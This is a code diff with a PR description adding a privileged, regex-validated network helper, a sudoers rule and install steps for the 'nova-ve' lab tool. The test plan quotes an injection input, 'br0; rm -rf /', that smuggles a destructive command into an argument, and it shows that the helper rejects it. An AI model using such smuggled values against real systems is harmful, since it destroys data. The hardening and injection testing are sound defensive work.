+# Cgroup fingerprint patterns (defense-in-depth secondary check).
+RE_CGROUP_DOCKER_V1 = re.compile(r"docker[/\-][0-9a-f]{12,}")
+RE_CGROUP_CRIO_V1 = re.compile(r"crio[/\-][0-9a-f]{12,}")
+RE_CGROUP_DOCKER_V2_SCOPE = re.compile(r"docker-[0-9a-f]{12,}\.scope")
+RE_CGROUP_CONTAINERD_V2_SCOPE = re.compile(r"containerd-[0-9a-f]{12,}\.scope")
+RE_COMM_QEMU = re.compile(r"^qemu-system-.+$")
+
+
+def _read_proc_text(pid: int, name: str) -> str:
+    path = PROC_ROOT / str(pid) / name
+    try:
+        return path.read_text()
+    except (FileNotFoundError, ProcessLookupError, PermissionError, OSError):
+        return ""
+
+
+def _cgroup_or_comm_matches(pid: int) -> bool:
+    cgroup = _read_proc_text(pid, "cgroup")
+    if (
+        RE_CGROUP_DOCKER_V1.search(cgroup)
+        or RE_CGROUP_CRIO_V1.search(cgroup)
+        or RE_CGROUP_DOCKER_V2_SCOPE.search(cgroup)
+        or RE_CGROUP_CONTAINERD_V2_SCOPE.search(cgroup)
+    ):
+        return True
+    comm = _read_proc_text(pid, "comm").strip()
+    if comm and RE_COMM_QEMU.match(comm):
+        return True
+    return False
+
+
+def _emit_ownership_diagnostic(pid: int) -> None:
+    comm = _read_proc_text(pid, "comm").rstrip("\n")[:80]
+    cgroup_lines = _read_proc_text(pid, "cgroup").splitlines()[:5]
+    print(f"pid ownership check FAILED for pid={pid}", file=sys.stderr)
+    print(f"  /proc/{pid}/comm: {comm}", file=sys.stderr)
+    print(f"  /proc/{pid}/cgroup (first 5 lines):", file=sys.stderr)
+    for line in cgroup_lines:
+        print(f"    {line}", file=sys.stderr)
+    print(
+        "  expected one of: docker[/-]<hex>, docker-<hex>.scope, "
+        "containerd-<hex>.scope, crio[/-]<hex>, or comm matching qemu-system-*",
+        file=sys.stderr,
+    )
+
+
+def authorize_pid(value: str) -> int:
+    """Validate pid argv shape AND verify ownership.
+
+    Order: regex shape → reserved range → registry lookup → cgroup/comm
+    defense-in-depth.  On any failure raises ``_ValidationError`` after
+    emitting the structured diagnostic specified in US-201.
+    """
+    pid = validate_pid_shape(value)
+    if _registry_lookup(pid) is None:
+        _emit_ownership_diagnostic(pid)
+        raise _ValidationError("pid_not_in_registry")
+    if not _cgroup_or_comm_matches(pid):
+        _emit_ownership_diagnostic(pid)
+        raise _ValidationError("pid_cgroup_mismatch")
+    return pid
+
+
+# ---------------------------------------------------------------------------
+# Subprocess invocation (shell=False, fixed argv)
+# ---------------------------------------------------------------------------
+
+
+def _run(argv: Sequence[str]) -> int:
+    """Run ``argv`` with ``shell=False``; return the child exit code.
+
+    stdout/stderr are streamed through to the caller so the wrapping
+    backend service can capture diagnostics.
+    """
+    # Defensive: every element of argv must already be a str.  A non-str
+    # element here would be a programming error in this file (not user
+    # input — argv values arrived as strings via argparse).  Catch it
+    # eagerly so a typo can never bypass validation.
+    for piece in argv:
+        if not isinstance(piece, str):
+            raise TypeError(f"argv element not a str: {piece!r}")
+    try:
+        proc = subprocess.run(list(argv), shell=False, check=False)
+    except FileNotFoundError as exc:
+        print(f"required binary not found: {exc}", file=sys.stderr)
+        return 1
+    return proc.returncode
+
+
+def _ip(*args: str) -> int:
+    return _run([IP_BIN, *args])
+
+
+def _nsenter_ip_netns(pid: int, *args: str) -> int:
+    """``nsenter -t <pid> -n ip <args>`` with shell=False."""
+    return _run([NSENTER_BIN, "-t", str(pid), "-n", IP_BIN, *args])
+
+
+def _nsenter_cat_address(pid: int, iface: str) -> int:
+    """Read MAC of ``iface`` inside ``pid``'s netns by reading sysfs."""
+    return _run(
+        [
+            NSENTER_BIN,
+            "-t",
+            str(pid),
+            "-n",
+            "cat",
+            f"/sys/class/net/{iface}/address",
+        ]
+    )
+
+
+# ---------------------------------------------------------------------------
+# Verb implementations (each verb = one fixed ip/nsenter invocation)
+# ---------------------------------------------------------------------------
+
+
+def cmd_bridge_add(args: argparse.Namespace) -> int:
+    name = validate_bridge_name(args.name)
+    return _ip("link", "add", name, "type", "bridge")
+
+
+def cmd_bridge_del(args: argparse.Namespace) -> int:
+    name = validate_bridge_name(args.name)
+    return _ip("link", "del", name)
+
+
+def cmd_tap_add(args: argparse.Namespace) -> int:
+    name = validate_tap_name(args.name)
+    return _ip("tuntap", "add", "dev", name, "mode", "tap")
+
+
+def cmd_tap_del(args: argparse.Namespace) -> int:
+    name = validate_tap_name(args.name)
+    return _ip("link", "del", name)
+
+
+def cmd_veth_pair_add(args: argparse.Namespace) -> int:
+    host = validate_veth_name(args.hostend, label="hostend")
+    peer = validate_veth_name(args.peerend, label="peerend")
+    if host == peer:
+        raise _ValidationError("hostend==peerend")
+    return _ip("link", "add", host, "type", "veth", "peer", "name", peer)
+
+
+def cmd_link_master(args: argparse.Namespace) -> int:
+    iface = validate_iface_name(args.iface)
+    bridge = validate_bridge_name(args.bridge)
+    return _ip("link", "set", iface, "master", bridge)
+
+
+def cmd_link_set_nomaster(args: argparse.Namespace) -> int:
+    iface = validate_iface_name(args.iface)
+    return _ip("link", "set", iface, "nomaster")
+
+
+def cmd_link_netns(args: argparse.Namespace) -> int:
+    iface = validate_iface_name(args.iface)
+    pid = authorize_pid(args.pid)
+    return _ip("link", "set", iface, "netns", str(pid))
+
+
+def cmd_link_up(args: argparse.Namespace) -> int:
+    iface = validate_iface_name(args.iface)
+    return _ip("link", "set", iface, "up")
+
+
+def cmd_link_set_name_in_netns(args: argparse.Namespace) -> int:
+    pid = authorize_pid(args.pid)
+    # Inside the netns the *current* name is whatever ``link-netns`` left
+    # behind — a veth peer name (``...p``) — and the new name is an
+    # ``ethN`` slot.  Both shapes validated.
+    oldname = validate_iface_name(args.oldname, label="oldname")
+    newname = validate_netns_iface(args.newname)
+    # ``ip link set <old> name <new>`` requires the link be DOWN; the
+    # caller (host_net) must arrange that.  We expose only the rename.
+    return _nsenter_ip_netns(pid, "link", "set", oldname, "name", newname)
+
+
+def cmd_addr_add_in_netns(args: argparse.Namespace) -> int:
+    pid = authorize_pid(args.pid)
+    iface = validate_netns_iface(args.iface)
+    cidr = validate_cidr(args.cidr)
+    return _nsenter_ip_netns(pid, "addr", "add", cidr, "dev", iface)
+
+
+def cmd_addr_up_in_netns(args: argparse.Namespace) -> int:
+    pid = authorize_pid(args.pid)
+    iface = validate_netns_iface(args.iface)
+    return _nsenter_ip_netns(pid, "link", "set", iface, "up")
+
+
+def cmd_read_iface_mac(args: argparse.Namespace) -> int:
+    pid = authorize_pid(args.pid)
+    iface = validate_netns_iface(args.iface)
+    return _nsenter_cat_address(pid, iface)
+
+
+# ---------------------------------------------------------------------------
+# argparse wiring
+# ---------------------------------------------------------------------------
+
+
+VERB_TABLE: Mapping[str, Callable[[argparse.Namespace], int]] = {
+    "bridge-add": cmd_bridge_add,
+    "bridge-del": cmd_bridge_del,
+    "tap-add": cmd_tap_add,
+    "tap-del": cmd_tap_del,
+    "veth-pair-add": cmd_veth_pair_add,
+    "link-master": cmd_link_master,
+    "link-set-nomaster": cmd_link_set_nomaster,
+    "link-netns": cmd_link_netns,
+    "link-up": cmd_link_up,
+    "link-set-name-in-netns": cmd_link_set_name_in_netns,
+    "addr-add-in-netns": cmd_addr_add_in_netns,
+    "addr-up-in-netns": cmd_addr_up_in_netns,
+    "read-iface-mac": cmd_read_iface_mac,
+}
+
+
+def build_parser() -> argparse.ArgumentParser:
+    parser = argparse.ArgumentParser(
+        prog="nova-ve-net.py",
+        description=(
+            "Privileged network helper for nova-ve.  Each verb is a "
+            "fixed ip/nsenter invocation with regex-validated arguments."
+        ),
+    )
+    sub = parser.add_subparsers(dest="verb", required=True, metavar="VERB")
+
+    p = sub.add_parser("bridge-add", help="ip link add <name> type bridge")
+    p.add_argument("name")
+
+    p = sub.add_parser("bridge-del", help="ip link del <name>")
+    p.add_argument("name")
+
+    p = sub.add_parser("tap-add", help="ip tuntap add dev <name> mode tap")
+    p.add_argument("name")
+
+    p = sub.add_parser("tap-del", help="ip link del <name>")
+    p.add_argument("name")
+
+    p = sub.add_parser("veth-pair-add", help="ip link add <h> type veth peer name <p>")
+    p.add_argument("hostend")
+    p.add_argument("peerend")
+
+    p = sub.add_parser("link-master", help="ip link set <iface> master <bridge>")
+    p.add_argument("iface")
+    p.add_argument("bridge")
+
+    p = sub.add_parser("link-set-nomaster", help="ip link set <iface> nomaster")
+    p.add_argument("iface")
+
+    p = sub.add_parser("link-netns", help="ip link set <iface> netns <pid>")
+    p.add_argument("iface")
+    p.add_argument("pid")
+
+    p = sub.add_parser("link-up", help="ip link set <iface> up")
+    p.add_argument("iface")
+
+    p = sub.add_parser(
+        "link-set-name-in-netns",
+        help="nsenter -t <pid> -n ip link set <oldname> name <newname>",
+    )
+    p.add_argument("pid")
+    p.add_argument("oldname")
+    p.add_argument("newname")
+
+    p = sub.add_parser(
+        "addr-add-in-netns",
+        help="nsenter -t <pid> -n ip addr add <cidr> dev <iface>",
+    )
+    p.add_argument("pid")
+    p.add_argument("iface")
+    p.add_argument("cidr")
+
+    p = sub.add_parser(
+        "addr-up-in-netns",
+        help="nsenter -t <pid> -n ip link set <iface> up",
+    )
+    p.add_argument("pid")
+    p.add_argument("iface")
+
+    p = sub.add_parser(
+        "read-iface-mac",
+        help="nsenter -t <pid> -n cat /sys/class/net/<iface>/address",
+    )
+    p.add_argument("pid")
+    p.add_argument("iface")
+
+    return parser
+
+
+def main(argv: Sequence[str] | None = None) -> int:
+    parser = build_parser()
+    # argparse exits 2 on parse failure (unknown verb, missing args); we
+    # let that propagate.  We use exit code 3 only if an unknown verb
+    # somehow makes it past argparse — defensive.
+    try:
+        args = parser.parse_args(argv)
+    except SystemExit as exc:
+        # argparse already wrote a message; re-raise to honour its code.
+        return int(exc.code) if isinstance(exc.code, int) else 2
+    handler = VERB_TABLE.get(args.verb)
+    if handler is None:
+        print(f"unknown verb: {args.verb}", file=sys.stderr)
+        return 3
+    try:
+        return handler(args)
+    except _ValidationError as exc:
+        print(f"argument failed validation: {exc}", file=sys.stderr)
+        return 2
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/deploy/nova-ve-sudoers
+++ b/deploy/nova-ve-sudoers
@@ -1,0 +1,22 @@
+# nova-ve privileged network helper — sudoers fragment.
+#
+# Installed by deploy/scripts/provision-ubuntu-2604.sh to
+# /etc/sudoers.d/nova-ve (mode 0440, owner root).  The deploy script
+# validates the file with ``visudo -cf`` before installing it; visudo
+# rejects a malformed fragment so a typo cannot brick sudo.
+#
+# Spec: .omc/plans/network-runtime-wiring.md § US-201.
+#
+# Why this is safe despite the trailing ``*``:
+#   * the helper itself uses ``subprocess.run([...], shell=False)`` —
+#     argv is never spliced into a shell string;
+#   * each verb maps to ONE fixed ``ip`` / ``nsenter ip`` invocation;
+#   * every argv argument is validated against a tight regex BEFORE
+#     any subprocess is spawned;
+#   * pid-taking verbs additionally consult the runtime registry at
+#     /var/lib/nova-ve/runtime/pids.json to constrain operations to
+#     processes that nova-ve itself spawned.
+#
+# Therefore the only thing the ``*`` controls is sudo's own argv
+# splitting; the helper closes the shell-injection class structurally.
+ubuntu ALL=(root) NOPASSWD: /opt/nova-ve/bin/nova-ve-net.py *

--- a/deploy/scripts/provision-ubuntu-2604.sh
+++ b/deploy/scripts/provision-ubuntu-2604.sh
@@ -191,6 +191,31 @@ PY
   chmod 0600 "${ENV_FILE}"
 }
 
+install_nova_ve_net_helper() {
+  # US-201: install the privileged network helper at /opt/nova-ve/bin and
+  # drop the sudoers fragment into /etc/sudoers.d after a visudo dry-run.
+  local helper_src="${REPO_ROOT}/deploy/nova-ve-net.py"
+  local sudoers_src="${REPO_ROOT}/deploy/nova-ve-sudoers"
+  local helper_dst="/opt/nova-ve/bin/nova-ve-net.py"
+  local sudoers_dst="/etc/sudoers.d/nova-ve"
+
+  if [[ "${DRY_RUN}" -eq 1 ]]; then
+    echo "+ install -d -o root -g root -m 0755 /opt/nova-ve/bin"
+    echo "+ install -m 0755 -o root -g root ${helper_src} ${helper_dst}"
+    echo "+ visudo -cf ${sudoers_src}"
+    echo "+ install -m 0440 -o root -g root ${sudoers_src} ${sudoers_dst}"
+    return 0
+  fi
+
+  install -d -o root -g root -m 0755 /opt/nova-ve /opt/nova-ve/bin
+  install -m 0755 -o root -g root "${helper_src}" "${helper_dst}"
+  if ! visudo -cf "${sudoers_src}" >/dev/null; then
+    echo "visudo rejected ${sudoers_src}; aborting deploy" >&2
+    exit 1
+  fi
+  install -m 0440 -o root -g root "${sudoers_src}" "${sudoers_dst}"
+}
+
 require_target_host
 
 run apt-get update
@@ -213,8 +238,9 @@ run apt-get install -y --no-install-recommends \
   npm
 
 run install -d -o "${APP_OWNER}" -g "${APP_GROUP}" -m 0755 /var/lib/nova-ve
-run install -d -o "${APP_OWNER}" -g "${APP_GROUP}" -m 0755 /var/lib/nova-ve/labs /var/lib/nova-ve/images /var/lib/nova-ve/tmp /var/lib/nova-ve/guacamole /var/lib/nova-ve/guacamole/db "${FRONTEND_ROOT}"
+run install -d -o "${APP_OWNER}" -g "${APP_GROUP}" -m 0755 /var/lib/nova-ve/labs /var/lib/nova-ve/images /var/lib/nova-ve/tmp /var/lib/nova-ve/guacamole /var/lib/nova-ve/guacamole/db /var/lib/nova-ve/runtime "${FRONTEND_ROOT}"
 run chown -R "${APP_OWNER}:${APP_GROUP}" /var/lib/nova-ve
+install_nova_ve_net_helper
 run systemctl enable docker
 run systemctl restart docker
 run usermod -aG docker "${APP_OWNER}"


### PR DESCRIPTION
Closes #87. Part of #80.

Wave 6 root — single privileged Python helper with fixed-verb argv, regex-validated args, and pid-ownership check against the nova-ve runtime registry.

## Summary
- New `deploy/nova-ve-net.py` — single-file Python helper exposing 13 fixed verbs (`bridge-add`/`bridge-del`, `tap-add`/`tap-del`, `veth-pair-add`, `link-master`/`link-set-nomaster`/`link-netns`/`link-up`, `link-set-name-in-netns`, `addr-add-in-netns`/`addr-up-in-netns`, `read-iface-mac`). Each verb maps to ONE fixed `ip` / `nsenter ip` invocation with `subprocess.run([...], shell=False)`. No generic in-netns escape hatch.
- New `deploy/nova-ve-sudoers` — `ubuntu ALL=(root) NOPASSWD: /opt/nova-ve/bin/nova-ve-net.py *` fragment installed to `/etc/sudoers.d/nova-ve` after `visudo -cf` validation.
- `deploy/scripts/provision-ubuntu-2604.sh` — installs the helper to `/opt/nova-ve/bin/nova-ve-net.py` (mode 0755, root) and the sudoers fragment (mode 0440, root). Adds `/var/lib/nova-ve/runtime/` to the bootstrap.
- Three regression-test files: `backend/tests/test_nova_ve_net_helper.py` (verb parser + regex matrix + unknown-verb), `backend/tests/test_host_net_argv_injection.py` (table of malicious payloads), `backend/tests/test_host_net_pid_ownership_diagnostic.py` (registry / cgroup-fingerprint / diagnostic format).

## Test plan
- [x] 255 helper unit tests pass (`pytest backend/tests/test_nova_ve_net_helper.py backend/tests/test_host_net_argv_injection.py backend/tests/test_host_net_pid_ownership_diagnostic.py`).
- [x] Full backend suite still green (354 passed).
- [x] `python deploy/nova-ve-net.py --help` lists all 13 verbs cleanly.
- [x] `python deploy/nova-ve-net.py wormhole foo` exits non-zero (argparse-rejected unknown verb).
- [x] `python deploy/nova-ve-net.py bridge-add 'br0; rm -rf /'` exits 2 with `argument failed validation: bridge_name`.
- [x] `bash -n deploy/scripts/provision-ubuntu-2604.sh` shell-syntax clean.
- [x] `bash deploy/scripts/provision-ubuntu-2604.sh --dry-run` emits the expected helper+sudoers install lines.
- [ ] Manual on test VM: `sudo /opt/nova-ve/bin/nova-ve-net.py bridge-add nove0001n1 && ip link show nove0001n1` succeeds; `sudo /opt/nova-ve/bin/nova-ve-net.py bridge-del nove0001n1` cleans up. (Deferred — runs after deploy.)

## Security notes
- No generic in-netns escape hatch; each verb is a discrete subcommand with a fixed `ip` / `nsenter ip` invocation.
- Every argv argument regex-validated against tight patterns (kernel `IFNAMSIZ=16` aware): bridge `^nove[a-f0-9]{4}n[0-9]{1,5}$`, TAP `^nve[a-f0-9]{4}d[0-9]{1,3}i[0-9]{1,2}$`, veth `^…[hp]$`, netns iface `^eth[0-9]{1,2}$`, pid `^[0-9]{1,7}$` (additionally rejects pid==1 and pid<10), cidr via `ipaddress.IPv4Interface` (IPv6 deferred per plan).
- Pid-ownership check against `/var/lib/nova-ve/runtime/pids.json` registry; missing file or corrupted JSON → deny all (with stderr diagnostic). Defense-in-depth secondary check fingerprints `/proc/{pid}/cgroup` for cgroup v1 (`docker[/-]<hex>`, `crio[/-]<hex>`) and v2 (`docker-<hex>.scope`, `containerd-<hex>.scope`) plus `/proc/{pid}/comm` matching `qemu-system-*`.
- Structured ownership-failure diagnostic per US-201: `pid ownership check FAILED for pid={pid}\n  /proc/{pid}/comm: {≤80 chars}\n  /proc/{pid}/cgroup (first 5 lines):\n    …\n  expected one of: docker[/-]<hex>, docker-<hex>.scope, containerd-<hex>.scope, crio[/-]<hex>, or comm matching qemu-system-*`.
- Sudoers `*` is structurally safe because the helper uses `subprocess.run(..., shell=False)` exclusively; the `*` controls only sudo's argv splitting.
- Static guard: `test_helper_uses_subprocess_without_shell` asserts the source contains zero `shell=True` occurrences.